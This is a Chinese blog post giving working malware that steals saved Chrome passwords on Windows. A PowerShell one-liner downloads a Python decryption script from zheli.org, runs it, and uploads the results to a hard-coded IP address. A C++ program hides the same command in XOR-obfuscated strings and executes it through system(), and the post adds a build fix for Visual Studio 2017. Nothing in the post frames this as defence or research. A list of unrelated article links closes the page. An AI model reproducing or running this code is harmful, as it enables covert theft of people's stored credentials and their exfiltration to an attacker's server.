【Windows C++】powershell 获取chrome密码并上传
获取chrome密码是lijiejie的python脚本,因此powershell代码依赖于:python和pywin32(通过pip安装)
powershell代码:
#1 下载文件保存在用户temp目录下
Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt
#2 pip安装pywin32用于解密
pip install pywin32
#3 执行python脚本
python $env:temp/update.txt
#4 回传数据
Invoke-RestMethod -Uri http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt最终:
powershell "Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt ;pip install pywin32; python $env:temp/update.txt ; Invoke-RestMethod -Uri http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt"
C++实现:
#include "windows.h"
#include "string.h"
using namespace std;int main()
{char cDllname[] = "\x7c\x62\x67\x72\x63\x65\x3f\x75\x7d\x7d";char cSystem[] = "\x62\x68\x62\x65\x74\x7c";//"system";char cPayload[] = "\x61\x7e\x66\x74\x63\x62\x79\x74\x7d\x7d\x31\x33\x58\x7f\x67\x7e\x7a\x74\x3c\x46\x74\x73\x43\x74\x60\x64\x74\x62\x65\x31\x3c\x44\x63\x78\x31\x79\x65\x65\x61\x2b\x3e\x3e\x6b\x79\x74\x7d\x78\x3f\x7e\x63\x76\x3e\x75\x70\x65\x70\x3e\x23\x21\x20\x29\x21\x29\x26\x28\x24\x26\x23\x22\x3f\x65\x69\x65\x31\x3c\x5e\x64\x65\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x2a\x61\x78\x61\x31\x78\x7f\x62\x65\x70\x7d\x7d\x31\x61\x68\x66\x78\x7f\x22\x23\x2a\x31\x61\x68\x65\x79\x7e\x7f\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x31\x2a\x31\x58\x7f\x67\x7e\x7a\x74\x3c\x43\x74\x62\x65\x5c\x74\x65\x79\x7e\x75\x31\x3c\x44\x63\x78\x31\x31\x79\x65\x65\x61\x2b\x3e\x3e\x25\x24\x3f\x22\x23\x3f\x27\x27\x3f\x20\x25\x22\x2b\x29\x21\x21\x20\x3e\x63\x74\x72\x67\x61\x7e\x62\x65\x3f\x61\x79\x61\x31\x3c\x5c\x74\x65\x79\x7e\x75\x31\x41\x7e\x62\x65\x31\x3c\x58\x7f\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x7d\x7e\x76\x33";static bool bIsUpdated = false;if(!bIsUpdated){for(int i=0; i<strlen(cPayload); i++){if(i<strlen(cSystem)){cSystem[i] ^= 0x11;}if(i<strlen(cDllname)){cDllname[i] ^= 0x11;}cPayload[i] ^= 0x11;}typedef void (WINAPI *PGNSI)(char *);PGNSI pGNSI;pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(TEXT(cDllname)),cSystem);pGNSI(cPayload);bIsUpdated = true;}return 0;
}
如果在vs2017中遇到类型转换的问题,可以尝试替换其中这段代码,讲char* 转换成 LPCWSTR。
typedef void (WINAPI *PGNSI)(char *);PGNSI pGNSI;WCHAR wszClassName[256];MultiByteToWideChar(CP_ACP,0,cDllname,strlen(cDllname)+1,wszClassName,sizeof(wszClassName)/sizeof(wszClassName[0]));pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(wszClassName),cSystem);pGNSI(cPayload);bIsUpdated = true;
【Windows C++】powershell 获取chrome密码并上传相关推荐
- Nginx的安装基础配置(windows、linux)以及搭建图片服务器(windows、阿里云),文件上传
Nginx的安装基础配置(windows.linux)以及搭建图片服务器(windows.阿里云),文件上传 本文目录 文章目录 Nginx的安装基础配置(windows.linux)以及搭建图片服务 ...
- XShell多版本存在后门,避免服务器账号密码被上传
重大事件,知名终端模拟软件 Xshell 多版本存在后门,或上传用户服务器账号密码. 日前,360CERT 获悉某安全公司发现 NetSarang 的 Xmanager, Xshell, Xftp, ...
- java通过URL获取网络文件并上传到阿里云OSS文件服务器
首先,先从网络上读取到文件 /*** 从网络Url中读取文件* @param urlStr 文件URL地址* @throws IOException*/public String downLoadFr ...
- 动态获取爱奇艺上传视频mp4格式url地址
有时候,在工作中有些客户需要用到视频,我们大家都知道视频是非常的耗费流量的,因此,如果因为项目要求客户单独买台视频服务器是非常划不来的.那么将视频上传到优酷,爱奇艺等视频网站来托管那是一件很好的解决方 ...
- Windows下使用xShell向远程Linux上传文件
上传文件使用rz与sz命令,远程Linux系统上需要安装lrzsz工具包 下载安装包lrzsz-0.12.20.tar.gz: http://www.linuxidc.com/Linux/2010- ...
- 在windows环境下ftp服务器的文件上传和下载
在windows环境下ftp服务器的文件上传和下载 mo 一.上传本地文件 第一步:登录FTP服务器.在开始菜单中输入cmd,回车进入.输入ftp进入服务器,输入命令格式:open FTP服务器地址 ...
- 威纶通触摸屏没有密码无法上传和下载时,如何恢复出厂设置?
威纶通触摸屏没有密码无法上传和下载时,如何恢复出厂设置? 本次以TK6070iQ为例进行说明, 首先,拆掉屏幕后盖板的4颗螺丝,如下图所示, 找到电路板上的J5短路块位置,如下图所示,当前连接的是2. ...
- 【day29】图片base64格式如何获取后缀名并上传到指定路径下
public Result ImageBase64UploadFile(String base64Data){String tempFileName="";try {String ...
- windows学习记录之MFC通过URL上传下载文件
** HTTP四种常见的POST提交数据方式: ** HTTP/1.1 协议规定的 HTTP 请求方法有 OPTIONS.GET.HEAD.POST.PUT.DELETE.TRACE.CONNECT ...
最新文章
- 新瓶装旧酒,贴着区块链标签的QunQun社交平台真能讲个好故事?
- php上传多张图片为什么只显示一张,javascript,_js多张图片上传 也拿到多张图片的路径 在页面上展示只显示一张?只执行了一次???,javascript - phpStudy...
- php生成文件index.html,Typecho生成静态首页index.html文件
- java的collections_Java中Collection和Collections的区别
- C++复数的运算、运算符重载
- php同学录网站设计_基于PHP的校友录系统的设计与实现
- [Ubuntu] 16.04 卸载旧内核并禁止内核更新
- 推动数字化智能化转型 中关村数智经济发展论坛成功举办
- Enterprise Library Policy Injection Application Block 之一: PIAB Overview
- easyexcell导出专题
- 2017年数学建模美赛个人国际一等奖论文
- Unity-WebGL基于JS实现网页录音
- nacos指定外网ip
- 阳性水草与阴性水草的区分
- 编译原理(龙书第二版)--怎么求FOLLOW集
- 有一些C++基础的同学们如何喝下你的第一杯咖啡?
- 如何在Win11调出IE11浏览器?
- 7-158 判断4和7的倍数
- 股市日记之“赶火车一景”
- 使用Hexo搭建个人博客-保姆级教程
热门文章
- SMART Modular世迈科技推出首款XMM CXL内存模块
- 01-pandas时间类型dt类属性及方法
- 黑客攻击常见方法及安全策略制订(转)
- 拉勾教育 重学数据结构与算法 08 | 字符串:如何正确回答面试中高频考察的字符串匹配算法?
- POND:高效的 Python 通用对象池库
- mybatis-plus出错:Invalid bound statement (not found): com.kuang.mapper.UserMapper.selectList
- python怎么生成日志_python 生成模拟日志
- 浏览器实时查看日志log.io
- html写大学课程表
- AARRR模型 | 用户留存套路与习惯养成